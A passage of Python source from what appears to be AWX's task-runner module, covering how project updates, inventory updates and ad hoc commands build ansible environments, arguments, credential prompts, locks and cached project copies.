def build_env(self, project_update, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = super(RunProjectUpdate, self).build_env(project_update, private_data_dir, private_data_files=private_data_files)
env['ANSIBLE_RETRY_FILES_ENABLED'] = str(False)
env['ANSIBLE_ASK_PASS'] = str(False)
env['ANSIBLE_BECOME_ASK_PASS'] = str(False)
env['DISPLAY'] = '' # Prevent stupid password popup when running tests.
# give ansible a hint about the intended tmpdir to work around issues
# like https://github.com/ansible/ansible/issues/30064
env['TMP'] = settings.AWX_ISOLATION_BASE_PATH
env['PROJECT_UPDATE_ID'] = str(project_update.pk)
if settings.GALAXY_IGNORE_CERTS:
env['ANSIBLE_GALAXY_IGNORE'] = True
# build out env vars for Galaxy credentials (in order)
galaxy_server_list = []
if project_update.project.organization:
for i, cred in enumerate(project_update.project.organization.galaxy_credentials.all()):
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_URL'] = cred.get_input('url')
auth_url = cred.get_input('auth_url', default=None)
token = cred.get_input('token', default=None)
if token:
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_TOKEN'] = token
if auth_url:
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_AUTH_URL'] = auth_url
galaxy_server_list.append(f'server{i}')
if galaxy_server_list:
env['ANSIBLE_GALAXY_SERVER_LIST'] = ','.join(galaxy_server_list)
return env
def _build_scm_url_extra_vars(self, project_update):
"""
Helper method to build SCM url and extra vars with parameters needed
for authentication.
"""
extra_vars = {}
if project_update.credential:
scm_username = project_update.credential.get_input('username', default='')
scm_password = project_update.credential.get_input('password', default='')
else:
scm_username = ''
scm_password = ''
scm_type = project_update.scm_type
scm_url = update_scm_url(scm_type, project_update.scm_url, check_special_cases=False)
scm_url_parts = urlparse.urlsplit(scm_url)
# Prefer the username/password in the URL, if provided.
scm_username = scm_url_parts.username or scm_username
scm_password = scm_url_parts.password or scm_password
if scm_username:
if scm_type == 'svn':
extra_vars['scm_username'] = scm_username
extra_vars['scm_password'] = scm_password
scm_password = False
if scm_url_parts.scheme != 'svn+ssh':
scm_username = False
elif scm_url_parts.scheme.endswith('ssh'):
scm_password = False
elif scm_type in ('insights', 'archive'):
extra_vars['scm_username'] = scm_username
extra_vars['scm_password'] = scm_password
scm_url = update_scm_url(scm_type, scm_url, scm_username, scm_password, scp_format=True)
else:
scm_url = update_scm_url(scm_type, scm_url, scp_format=True)
# Pass the extra accept_hostkey parameter to the git module.
if scm_type == 'git' and scm_url_parts.scheme.endswith('ssh'):
extra_vars['scm_accept_hostkey'] = 'true'
return scm_url, extra_vars
def build_inventory(self, instance, private_data_dir):
return 'localhost,'
def build_args(self, project_update, private_data_dir, passwords):
"""
Build command line argument list for running ansible-playbook,
optionally using ssh-agent for public/private key authentication.
"""
args = []
if getattr(settings, 'PROJECT_UPDATE_VVV', False):
args.append('-vvv')
if project_update.job_tags:
args.extend(['-t', project_update.job_tags])
return args
def build_extra_vars_file(self, project_update, private_data_dir):
extra_vars = {}
scm_url, extra_vars_new = self._build_scm_url_extra_vars(project_update)
extra_vars.update(extra_vars_new)
scm_branch = project_update.scm_branch
if project_update.job_type == 'run' and (not project_update.branch_override):
if project_update.project.scm_revision:
scm_branch = project_update.project.scm_revision
elif not scm_branch:
raise RuntimeError('Could not determine a revision to run from project.')
elif not scm_branch:
scm_branch = 'HEAD'
galaxy_creds_are_defined = project_update.project.organization and project_update.project.organization.galaxy_credentials.exists()
if not galaxy_creds_are_defined and (settings.AWX_ROLES_ENABLED or settings.AWX_COLLECTIONS_ENABLED):
logger.warning('Galaxy role/collection syncing is enabled, but no ' f'credentials are configured for {project_update.project.organization}.')
extra_vars.update(
{
'projects_root': settings.PROJECTS_ROOT.rstrip('/'),
'local_path': os.path.basename(project_update.project.local_path),
'project_path': project_update.get_project_path(check_if_exists=False), # deprecated
'insights_url': settings.INSIGHTS_URL_BASE,
'awx_license_type': get_license().get('license_type', 'UNLICENSED'),
'awx_version': get_awx_version(),
'scm_url': scm_url,
'scm_branch': scm_branch,
'scm_clean': project_update.scm_clean,
'scm_track_submodules': project_update.scm_track_submodules,
'roles_enabled': galaxy_creds_are_defined and settings.AWX_ROLES_ENABLED,
'collections_enabled': galaxy_creds_are_defined and settings.AWX_COLLECTIONS_ENABLED,
}
)
# apply custom refspec from user for PR refs and the like
if project_update.scm_refspec:
extra_vars['scm_refspec'] = project_update.scm_refspec
elif project_update.project.allow_override:
# If branch is override-able, do extra fetch for all branches
extra_vars['scm_refspec'] = 'refs/heads/*:refs/remotes/origin/*'
if project_update.scm_type == 'archive':
# for raw archive, prevent error moving files between volumes
extra_vars['ansible_remote_tmp'] = os.path.join(project_update.get_project_path(check_if_exists=False), '.ansible_awx', 'tmp')
self._write_extra_vars_file(private_data_dir, extra_vars)
def build_playbook_path_relative_to_cwd(self, project_update, private_data_dir):
return os.path.join('project_update.yml')
def get_password_prompts(self, passwords={}):
d = super(RunProjectUpdate, self).get_password_prompts(passwords)
d[r'Username for.*:\s*?$'] = 'scm_username'
d[r'Password for.*:\s*?$'] = 'scm_password'
d[r'Password:\s*?$'] = 'scm_password'
d[r'\S+?@\S+?\'s\s+?password:\s*?$'] = 'scm_password'
d[r'Enter passphrase for .*:\s*?$'] = 'scm_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
# FIXME: Configure whether we should auto accept host keys?
d[r'^Are you sure you want to continue connecting \(yes/no\)\?\s*?$'] = 'yes'
return d
def _update_dependent_inventories(self, project_update, dependent_inventory_sources):
scm_revision = project_update.project.scm_revision
inv_update_class = InventoryUpdate._get_task_class()
for inv_src in dependent_inventory_sources:
if not inv_src.update_on_project_update:
continue
if inv_src.scm_last_revision == scm_revision:
logger.debug('Skipping SCM inventory update for `{}` because ' 'project has not changed.'.format(inv_src.name))
continue
logger.debug('Local dependent inventory update for `{}`.'.format(inv_src.name))
with transaction.atomic():
if InventoryUpdate.objects.filter(inventory_source=inv_src, status__in=ACTIVE_STATES).exists():
logger.debug('Skipping SCM inventory update for `{}` because ' 'another update is already active.'.format(inv_src.name))
continue
if settings.IS_K8S:
instance_group = InventoryUpdate(inventory_source=inv_src).preferred_instance_groups[0]
else:
instance_group = project_update.instance_group
local_inv_update = inv_src.create_inventory_update(
_eager_fields=dict(
launch_type='scm',
status='running',
instance_group=instance_group,
execution_node=project_update.execution_node,
source_project_update=project_update,
celery_task_id=project_update.celery_task_id,
)
)
try:
create_partition(local_inv_update.event_class._meta.db_table, start=local_inv_update.created)
inv_update_class().run(local_inv_update.id)
except Exception:
logger.exception('{} Unhandled exception updating dependent SCM inventory sources.'.format(project_update.log_format))
try:
project_update.refresh_from_db()
except ProjectUpdate.DoesNotExist:
logger.warning('Project update deleted during updates of dependent SCM inventory sources.')
break
try:
local_inv_update.refresh_from_db()
except InventoryUpdate.DoesNotExist:
logger.warning('%s Dependent inventory update deleted during execution.', project_update.log_format)
continue
if project_update.cancel_flag:
logger.info('Project update {} was canceled while updating dependent inventories.'.format(project_update.log_format))
break
if local_inv_update.cancel_flag:
logger.info('Continuing to process project dependencies after {} was canceled'.format(local_inv_update.log_format))
if local_inv_update.status == 'successful':
inv_src.scm_last_revision = scm_revision
inv_src.save(update_fields=['scm_last_revision'])
def release_lock(self, instance):
try:
fcntl.lockf(self.lock_fd, fcntl.LOCK_UN)
except IOError as e:
logger.error("I/O error({0}) while trying to release lock file [{1}]: {2}".format(e.errno, instance.get_lock_file(), e.strerror))
os.close(self.lock_fd)
raise
os.close(self.lock_fd)
self.lock_fd = None
'''
Note: We don't support blocking=False
'''
def acquire_lock(self, instance, blocking=True):
lock_path = instance.get_lock_file()
if lock_path is None:
# If from migration or someone blanked local_path for any other reason, recoverable by save
instance.save()
lock_path = instance.get_lock_file()
if lock_path is None:
raise RuntimeError(u'Invalid lock file path')
try:
self.lock_fd = os.open(lock_path, os.O_RDWR | os.O_CREAT)
except OSError as e:
logger.error("I/O error({0}) while trying to open lock file [{1}]: {2}".format(e.errno, lock_path, e.strerror))
raise
start_time = time.time()
while True:
try:
instance.refresh_from_db(fields=['cancel_flag'])
if instance.cancel_flag:
logger.debug("ProjectUpdate({0}) was canceled".format(instance.pk))
return
fcntl.lockf(self.lock_fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
break
except IOError as e:
if e.errno not in (errno.EAGAIN, errno.EACCES):
os.close(self.lock_fd)
logger.error("I/O error({0}) while trying to aquire lock on file [{1}]: {2}".format(e.errno, lock_path, e.strerror))
raise
else:
time.sleep(1.0)
waiting_time = time.time() - start_time
if waiting_time > 1.0:
logger.info('{} spent {} waiting to acquire lock for local source tree ' 'for path {}.'.format(instance.log_format, waiting_time, lock_path))
def pre_run_hook(self, instance, private_data_dir):
super(RunProjectUpdate, self).pre_run_hook(instance, private_data_dir)
# re-create root project folder if a natural disaster has destroyed it
if not os.path.exists(settings.PROJECTS_ROOT):
os.mkdir(settings.PROJECTS_ROOT)
project_path = instance.project.get_project_path(check_if_exists=False)
self.acquire_lock(instance)
self.original_branch = None
if instance.scm_type == 'git' and instance.branch_override:
if os.path.exists(project_path):
git_repo = git.Repo(project_path)
if git_repo.head.is_detached:
self.original_branch = git_repo.head.commit
else:
self.original_branch = git_repo.active_branch
if not os.path.exists(project_path):
os.makedirs(project_path) # used as container mount
stage_path = os.path.join(instance.get_cache_path(), 'stage')
if os.path.exists(stage_path):
logger.warning('{0} unexpectedly existed before update'.format(stage_path))
shutil.rmtree(stage_path)
os.makedirs(stage_path) # presence of empty cache indicates lack of roles or collections
# the project update playbook is not in a git repo, but uses a vendoring directory
# to be consistent with the ansible-runner model,
# that is moved into the runner project folder here
awx_playbooks = self.get_path_to('..', 'playbooks')
copy_tree(awx_playbooks, os.path.join(private_data_dir, 'project'))
@staticmethod
def clear_project_cache(cache_dir, keep_value):
if os.path.isdir(cache_dir):
for entry in os.listdir(cache_dir):
old_path = os.path.join(cache_dir, entry)
if entry not in (keep_value, 'stage'):
# invalidate, then delete
new_path = os.path.join(cache_dir, '.~~delete~~' + entry)
try:
os.rename(old_path, new_path)
shutil.rmtree(new_path)
except OSError:
logger.warning(f"Could not remove cache directory {old_path}")
@staticmethod
def make_local_copy(p, job_private_data_dir, scm_revision=None):
"""Copy project content (roles and collections) to a job private_data_dir
:param object p: Either a project or a project update
:param str job_private_data_dir: The root of the target ansible-runner folder
:param str scm_revision: For branch_override cases, the git revision to copy
"""
project_path = p.get_project_path(check_if_exists=False)
destination_folder = os.path.join(job_private_data_dir, 'project')
if not scm_revision:
scm_revision = p.scm_revision
if p.scm_type == 'git':
git_repo = git.Repo(project_path)
if not os.path.exists(destination_folder):
os.mkdir(destination_folder, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
tmp_branch_name = 'awx_internal/{}'.format(uuid4())
# always clone based on specific job revision
if not p.scm_revision:
raise RuntimeError('Unexpectedly could not determine a revision to run from project.')
source_branch = git_repo.create_head(tmp_branch_name, p.scm_revision)
# git clone must take file:// syntax for source repo or else options like depth will be ignored
source_as_uri = Path(project_path).as_uri()
git.Repo.clone_from(
source_as_uri,
destination_folder,
branch=source_branch,
depth=1,
single_branch=True, # shallow, do not copy full history
)
# submodules copied in loop because shallow copies from local HEADs are ideal
# and no git clone submodule options are compatible with minimum requirements
for submodule in git_repo.submodules:
subrepo_path = os.path.abspath(os.path.join(project_path, submodule.path))
subrepo_destination_folder = os.path.abspath(os.path.join(destination_folder, submodule.path))
subrepo_uri = Path(subrepo_path).as_uri()
git.Repo.clone_from(subrepo_uri, subrepo_destination_folder, depth=1, single_branch=True)
# force option is necessary because remote refs are not counted, although no information is lost
git_repo.delete_head(tmp_branch_name, force=True)
else:
copy_tree(project_path, destination_folder, preserve_symlinks=1)
# copy over the roles and collection cache to job folder
cache_path = os.path.join(p.get_cache_path(), p.cache_id)
subfolders = []
if settings.AWX_COLLECTIONS_ENABLED:
subfolders.append('requirements_collections')
if settings.AWX_ROLES_ENABLED:
subfolders.append('requirements_roles')
for subfolder in subfolders:
cache_subpath = os.path.join(cache_path, subfolder)
if os.path.exists(cache_subpath):
dest_subpath = os.path.join(job_private_data_dir, subfolder)
copy_tree(cache_subpath, dest_subpath, preserve_symlinks=1)
logger.debug('{0} {1} prepared {2} from cache'.format(type(p).__name__, p.pk, dest_subpath))
def post_run_hook(self, instance, status):
super(RunProjectUpdate, self).post_run_hook(instance, status)
# To avoid hangs, very important to release lock even if errors happen here
try:
if self.playbook_new_revision:
instance.scm_revision = self.playbook_new_revision
instance.save(update_fields=['scm_revision'])
# Roles and collection folders copy to durable cache
base_path = instance.get_cache_path()
stage_path = os.path.join(base_path, 'stage')
if status == 'successful' and 'install_' in instance.job_tags:
# Clear other caches before saving this one, and if branch is overridden
# do not clear cache for main branch, but do clear it for other branches
self.clear_project_cache(base_path, keep_value=instance.project.cache_id)
cache_path = os.path.join(base_path, instance.cache_id)
if os.path.exists(stage_path):
if os.path.exists(cache_path):
logger.warning('Rewriting cache at {0}, performance may suffer'.format(cache_path))
shutil.rmtree(cache_path)
os.rename(stage_path, cache_path)
logger.debug('{0} wrote to cache at {1}'.format(instance.log_format, cache_path))
elif os.path.exists(stage_path):
shutil.rmtree(stage_path) # cannot trust content update produced
if self.job_private_data_dir:
if status == 'successful':
# copy project folder before resetting to default branch
# because some git-tree-specific resources (like submodules) might matter
self.make_local_copy(instance, self.job_private_data_dir)
if self.original_branch:
# for git project syncs, non-default branches can be problems
# restore to branch the repo was on before this run
try:
self.original_branch.checkout()
except Exception:
# this could have failed due to dirty tree, but difficult to predict all cases
logger.exception('Failed to restore project repo to prior state after {}'.format(instance.log_format))
finally:
self.release_lock(instance)
p = instance.project
if instance.job_type == 'check' and status not in (
'failed',
'canceled',
):
if self.playbook_new_revision:
p.scm_revision = self.playbook_new_revision
else:
if status == 'successful':
logger.error("{} Could not find scm revision in check".format(instance.log_format))
p.playbook_files = p.playbooks
p.inventory_files = p.inventories
p.save(update_fields=['scm_revision', 'playbook_files', 'inventory_files'])
# Update any inventories that depend on this project
dependent_inventory_sources = p.scm_inventory_sources.filter(update_on_project_update=True)
if len(dependent_inventory_sources) > 0:
if status == 'successful' and instance.launch_type != 'sync':
self._update_dependent_inventories(instance, dependent_inventory_sources)
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
params = super(RunProjectUpdate, self).build_execution_environment_params(instance, private_data_dir)
project_path = instance.get_project_path(check_if_exists=False)
cache_path = instance.get_cache_path()
params.setdefault('container_volume_mounts', [])
params['container_volume_mounts'].extend(
[
f"{project_path}:{project_path}:Z",
f"{cache_path}:{cache_path}:Z",
]
)
return params
@task(queue=get_local_queuename)
class RunInventoryUpdate(BaseTask):
model = InventoryUpdate
event_model = InventoryUpdateEvent
event_data_key = 'inventory_update_id'
def build_private_data(self, inventory_update, private_data_dir):
"""
Return private data needed for inventory update.
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>
}
}
If no private data is needed, return None.
"""
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[inventory_update.source]()
return injector.build_private_data(inventory_update, private_data_dir)
def build_env(self, inventory_update, private_data_dir, private_data_files=None):
"""Build environment dictionary for ansible-inventory.
Most environment variables related to credentials or configuration
are accomplished by the inventory source injectors (in this method)
or custom credential type injectors (in main run method).
"""
env = super(RunInventoryUpdate, self).build_env(inventory_update, private_data_dir, private_data_files=private_data_files)
if private_data_files is None:
private_data_files = {}
# Pass inventory source ID to inventory script.
env['INVENTORY_SOURCE_ID'] = str(inventory_update.inventory_source_id)
env['INVENTORY_UPDATE_ID'] = str(inventory_update.pk)
env.update(STANDARD_INVENTORY_UPDATE_ENV)
injector = None
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[inventory_update.source]()
if injector is not None:
env = injector.build_env(inventory_update, env, private_data_dir, private_data_files)
# All CLOUD_PROVIDERS sources implement as inventory plugin from collection
env['ANSIBLE_INVENTORY_ENABLED'] = 'auto'
if inventory_update.source == 'scm':
for env_k in inventory_update.source_vars_dict:
if str(env_k) not in env and str(env_k) not in settings.INV_ENV_VARIABLE_BLOCKED:
env[str(env_k)] = str(inventory_update.source_vars_dict[env_k])
elif inventory_update.source == 'file':
raise NotImplementedError('Cannot update file sources through the task system.')
if inventory_update.source == 'scm' and inventory_update.source_project_update:
env_key = 'ANSIBLE_COLLECTIONS_PATHS'
config_setting = 'collections_paths'
folder = 'requirements_collections'
default = '~/.ansible/collections:/usr/share/ansible/collections'
config_values = read_ansible_config(os.path.join(private_data_dir, 'project'), [config_setting])
paths = default.split(':')
if env_key in env:
for path in env[env_key].split(':'):
if path not in paths:
paths = [env[env_key]] + paths
elif config_setting in config_values:
for path in config_values[config_setting].split(':'):
if path not in paths:
paths = [config_values[config_setting]] + paths
paths = [os.path.join(CONTAINER_ROOT, folder)] + paths
env[env_key] = os.pathsep.join(paths)
if 'ANSIBLE_COLLECTIONS_PATHS' in env:
paths = env['ANSIBLE_COLLECTIONS_PATHS'].split(':')
else:
paths = ['~/.ansible/collections', '/usr/share/ansible/collections']
paths.append('/usr/share/automation-controller/collections')
env['ANSIBLE_COLLECTIONS_PATHS'] = os.pathsep.join(paths)
return env
def write_args_file(self, private_data_dir, args):
path = os.path.join(private_data_dir, 'args')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(' '.join(args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_args(self, inventory_update, private_data_dir, passwords):
"""Build the command line argument list for running an inventory
import.
"""
# Get the inventory source and inventory.
inventory_source = inventory_update.inventory_source
inventory = inventory_source.inventory
if inventory is None:
raise RuntimeError('Inventory Source is not associated with an Inventory.')
args = ['ansible-inventory', '--list', '--export']
# Add arguments for the source inventory file/script/thing
rel_path = self.pseudo_build_inventory(inventory_update, private_data_dir)
container_location = os.path.join(CONTAINER_ROOT, rel_path)
source_location = os.path.join(private_data_dir, rel_path)
args.append('-i')
args.append(container_location)
args.append('--output')
args.append(os.path.join(CONTAINER_ROOT, 'artifacts', str(inventory_update.id), 'output.json'))
if os.path.isdir(source_location):
playbook_dir = container_location
else:
playbook_dir = os.path.dirname(container_location)
args.extend(['--playbook-dir', playbook_dir])
if inventory_update.verbosity:
args.append('-' + 'v' * min(5, inventory_update.verbosity * 2 + 1))
return args
def build_inventory(self, inventory_update, private_data_dir):
return None # what runner expects in order to not deal with inventory
def pseudo_build_inventory(self, inventory_update, private_data_dir):
"""Inventory imports are ran through a management command
we pass the inventory in args to that command, so this is not considered
to be "Ansible" inventory (by runner) even though it is
Eventually, we would like to cut out the management command,
and thus use this as the real inventory
"""
src = inventory_update.source
injector = None
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[src]()
if injector is not None:
content = injector.inventory_contents(inventory_update, private_data_dir)
# must be a statically named file
inventory_path = os.path.join(private_data_dir, 'inventory', injector.filename)
with open(inventory_path, 'w') as f:
f.write(content)
os.chmod(inventory_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
rel_path = os.path.join('inventory', injector.filename)
elif src == 'scm':
rel_path = os.path.join('project', inventory_update.source_path)
return rel_path
def build_playbook_path_relative_to_cwd(self, inventory_update, private_data_dir):
return None
def build_credentials_list(self, inventory_update):
# All credentials not used by inventory source injector
return inventory_update.get_extra_credentials()
def pre_run_hook(self, inventory_update, private_data_dir):
super(RunInventoryUpdate, self).pre_run_hook(inventory_update, private_data_dir)
source_project = None
if inventory_update.inventory_source:
source_project = inventory_update.inventory_source.source_project
if (
inventory_update.source == 'scm' and inventory_update.launch_type != 'scm' and source_project and source_project.scm_type
): # never ever update manual projects
# Check if the content cache exists, so that we do not unnecessarily re-download roles
sync_needs = ['update_{}'.format(source_project.scm_type)]
has_cache = os.path.exists(os.path.join(source_project.get_cache_path(), source_project.cache_id))
# Galaxy requirements are not supported for manual projects
if not has_cache:
sync_needs.extend(['install_roles', 'install_collections'])
local_project_sync = source_project.create_project_update(
_eager_fields=dict(
launch_type="sync",
job_type='run',
job_tags=','.join(sync_needs),
status='running',
execution_node=inventory_update.execution_node,
instance_group=inventory_update.instance_group,
celery_task_id=inventory_update.celery_task_id,
)
)
# associate the inventory update before calling run() so that a
# cancel() call on the inventory update can cancel the project update
local_project_sync.scm_inventory_updates.add(inventory_update)
project_update_task = local_project_sync._get_task_class()
try:
sync_task = project_update_task(job_private_data_dir=private_data_dir)
sync_task.run(local_project_sync.id)
local_project_sync.refresh_from_db()
inventory_update.inventory_source.scm_last_revision = local_project_sync.scm_revision
inventory_update.inventory_source.save(update_fields=['scm_last_revision'])
except Exception:
inventory_update = self.update_model(
inventory_update.pk,
status='failed',
job_explanation=(
'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}'
% ('project_update', local_project_sync.name, local_project_sync.id)
),
)
raise
elif inventory_update.source == 'scm' and inventory_update.launch_type == 'scm' and source_project:
# This follows update, not sync, so make copy here
RunProjectUpdate.make_local_copy(source_project, private_data_dir)
def post_run_hook(self, inventory_update, status):
super(RunInventoryUpdate, self).post_run_hook(inventory_update, status)
if status != 'successful':
return # nothing to save, step out of the way to allow error reporting
private_data_dir = inventory_update.job_env['AWX_PRIVATE_DATA_DIR']
expected_output = os.path.join(private_data_dir, 'artifacts', 'output.json')
with open(expected_output) as f:
data = json.load(f)
# build inventory save options
options = dict(
overwrite=inventory_update.overwrite,
overwrite_vars=inventory_update.overwrite_vars,
)
src = inventory_update.source
if inventory_update.enabled_var:
options['enabled_var'] = inventory_update.enabled_var
options['enabled_value'] = inventory_update.enabled_value
else:
if getattr(settings, '%s_ENABLED_VAR' % src.upper(), False):
options['enabled_var'] = getattr(settings, '%s_ENABLED_VAR' % src.upper())
if getattr(settings, '%s_ENABLED_VALUE' % src.upper(), False):
options['enabled_value'] = getattr(settings, '%s_ENABLED_VALUE' % src.upper())
if inventory_update.host_filter:
options['host_filter'] = inventory_update.host_filter
if getattr(settings, '%s_EXCLUDE_EMPTY_GROUPS' % src.upper()):
options['exclude_empty_groups'] = True
if getattr(settings, '%s_INSTANCE_ID_VAR' % src.upper(), False):
options['instance_id_var'] = getattr(settings, '%s_INSTANCE_ID_VAR' % src.upper())
# Verbosity is applied to saving process, as well as ansible-inventory CLI option
if inventory_update.verbosity:
options['verbosity'] = inventory_update.verbosity
handler = SpecialInventoryHandler(
self.event_handler,
self.cancel_callback,
verbosity=inventory_update.verbosity,
job_timeout=self.get_instance_timeout(self.instance),
start_time=inventory_update.started,
counter=self.event_ct,
initial_line=self.end_line,
)
inv_logger = logging.getLogger('awx.main.commands.inventory_import')
formatter = inv_logger.handlers[0].formatter
formatter.job_start = inventory_update.started
handler.formatter = formatter
inv_logger.handlers[0] = handler
from awx.main.management.commands.inventory_import import Command as InventoryImportCommand
cmd = InventoryImportCommand()
try:
# save the inventory data to database.
# canceling exceptions will be handled in the global post_run_hook
cmd.perform_update(options, data, inventory_update)
except PermissionDenied as exc:
logger.exception('License error saving {} content'.format(inventory_update.log_format))
raise PostRunError(str(exc), status='error')
except PostRunError:
logger.exception('Error saving {} content, rolling back changes'.format(inventory_update.log_format))
raise
except Exception:
logger.exception('Exception saving {} content, rolling back changes.'.format(inventory_update.log_format))
raise PostRunError('Error occured while saving inventory data, see traceback or server logs', status='error', tb=traceback.format_exc())
@task(queue=get_local_queuename)
class RunAdHocCommand(BaseTask):
"""
Run an ad hoc command using ansible.
"""
model = AdHocCommand
event_model = AdHocCommandEvent
event_data_key = 'ad_hoc_command_id'
def build_private_data(self, ad_hoc_command, private_data_dir):
"""
Return SSH private key data needed for this ad hoc command (only if
stored in DB as ssh_key_data).
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
...
},
'certificates': {
<awx.main.models.Credential>: <signed SSH certificate data>,
<awx.main.models.Credential>: <signed SSH certificate data>,
...
}
}
"""
# If we were sent SSH credentials, decrypt them and send them
# back (they will be written to a temporary file).
creds = ad_hoc_command.credential
private_data = {'credentials': {}}
if creds and creds.has_input('ssh_key_data'):
private_data['credentials'][creds] = creds.get_input('ssh_key_data', default='')
if creds and creds.has_input('ssh_public_key_data'):
private_data.setdefault('certificates', {})[creds] = creds.get_input('ssh_public_key_data', default='')
return private_data
def build_passwords(self, ad_hoc_command, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key, SSH user and
sudo/su.
"""
passwords = super(RunAdHocCommand, self).build_passwords(ad_hoc_command, runtime_passwords)
cred = ad_hoc_command.credential
if cred:
for field in ('ssh_key_unlock', 'ssh_password', 'become_password'):
value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))
if value not in ('', 'ASK'):
passwords[field] = value
return passwords
def build_env(self, ad_hoc_command, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible.
"""
env = super(RunAdHocCommand, self).build_env(ad_hoc_command, private_data_dir, private_data_files=private_data_files)
# Set environment variables needed for inventory and ad hoc event
# callbacks to work.
env['AD_HOC_COMMAND_ID'] = str(ad_hoc_command.pk)
env['INVENTORY_ID'] = str(ad_hoc_command.inventory.pk)
env['INVENTORY_HOSTVARS'] = str(True)
env['ANSIBLE_LOAD_CALLBACK_PLUGINS'] = '1'
env['ANSIBLE_SFTP_BATCH_MODE'] = 'False'
return env
def build_args(self, ad_hoc_command, private_data_dir, passwords):
"""
Build command line argument list for running ansible, optionally using
ssh-agent for public/private key authentication.
"""
creds = ad_hoc_command.credential
ssh_username, become_username, become_method = '', '', ''
if creds:
ssh_username = creds.get_input('username', default='')
become_method = creds.get_input('become_method', default='')
become_username = creds.get_input('become_username', default='')
else:
become_method = None
become_username = ""
# Always specify the normal SSH user as root by default. Since this
# task is normally running in the background under a service account,
# it doesn't make sense to rely on ansible's default of using the
# current user.
ssh_username = ssh_username or 'root'
args = []
if ad_hoc_command.job_type == 'check':
args.append('--check')
args.extend(['-u', sanitize_jinja(ssh_username)])
if 'ssh_password' in passwords:
args.append('--ask-pass')
# We only specify sudo/su user and password if explicitly given by the
# credential. Credential should never specify both sudo and su.
if ad_hoc_command.become_enabled:
args.append('--become')
if become_method:
args.extend(['--become-method', sanitize_jinja(become_method)])
if become_username:
args.extend(['--become-user', sanitize_jinja(become_username)])
if 'become_password' in passwords:
args.append('--ask-become-pass')
if ad_hoc_command.forks: # FIXME: Max limit?
args.append('--forks=%d' % ad_hoc_command.forks)
if ad_hoc_command.diff_mode:
args.append('--diff')
if ad_hoc_command.verbosity:
args.append('-%s' % ('v' * min(5, ad_hoc_command.verbosity)))
extra_vars = ad_hoc_command.awx_meta_vars()
if ad_hoc_command.extra_vars_dict:
redacted_extra_vars, removed_vars = extract_ansible_vars(ad_hoc_command.extra_vars_dict)
if removed_vars:
raise ValueError(_("{} are prohibited from use in ad hoc commands.").format(", ".join(removed_vars)))
extra_vars.update(ad_hoc_command.extra_vars_dict)
if ad_hoc_command.limit:
args.append(ad_hoc_command.limit)
else:
args.append('all')
return args
def build_extra_vars_file(self, ad_hoc_command, private_data_dir):
extra_vars = ad_hoc_command.awx_meta_vars()
if ad_hoc_command.extra_vars_dict:
redacted_extra_vars, removed_vars = extract_ansible_vars(ad_hoc_command.extra_vars_dict)
if removed_vars:
raise ValueError(_("{} are prohibited from use in ad hoc commands.").format(", ".join(removed_vars)))
extra_vars.update(ad_hoc_command.extra_vars_dict)
self._write_extra_vars_file(private_data_dir, extra_vars)
def build_module_name(self, ad_hoc_command):
return ad_hoc_command.module_name
def build_module_args(self, ad_hoc_command):
module_args = ad_hoc_command.module_args
if settings.ALLOW_JINJA_IN_EXTRA_VARS != 'always':
module_args = sanitize_jinja(module_args)
return module_args
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return None
def get_password_prompts(self, passwords={}):
d = super(RunAdHocCommand, self).get_password_prompts()
d[r'Enter passphrase for .*:\s*?$'] = 'ssh_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
for method in PRIVILEGE_ESCALATION_METHODS:
d[r'%s password.*:\s*?$' % (method[0])] = 'become_password'
d[r'%s password.*:\s*?$' % (method[0].upper())] = 'become_password'
d[r'BECOME password.*:\s*?$'] = 'become_password'
d[r'SSH password:\s*?$'] = 'ssh_password'
d[r'Password:\s*?$'] = 'ssh_password'
return d
@task(queue=get_local_queuename)
class RunSystemJob(BaseTask):
model = SystemJob
event_model = SystemJobEvent
event_data_key = 'system_job_id'
def build_execution_environment_params(self, system_job, private_data_dir):
return {}
def build_args(self, system_job, private_data_dir, passwords):
args = ['awx-manage', system_job.job_type]
try:
# System Job extra_vars can be blank, must be JSON if not blank
if system_job.extra_vars == '':
json_vars = {}
else:
json_vars = json.loads(system_job.extra_vars)
if system_job.job_type in ('cleanup_jobs', 'cleanup_activitystream'):
if 'days' in json_vars:
args.extend(['--days', str(json_vars.get('days', 60))])
if 'dry_run' in json_vars and json_vars['dry_run']:
args.extend(['--dry-run'])
if system_job.job_type == 'cleanup_jobs':
args.extend(
['--jobs', '--project-updates', '--inventory-updates', '--management-jobs', '--ad-hoc-commands', '--workflow-jobs', '--notifications']
)
except Exception:
logger.exception("{} Failed to parse system job".format(system_job.log_format))
return args
def write_args_file(self, private_data_dir, args):
path = os.path.join(private_data_dir, 'args')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(' '.join(args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_env(self, instance, private_data_dir, private_data_files=None):
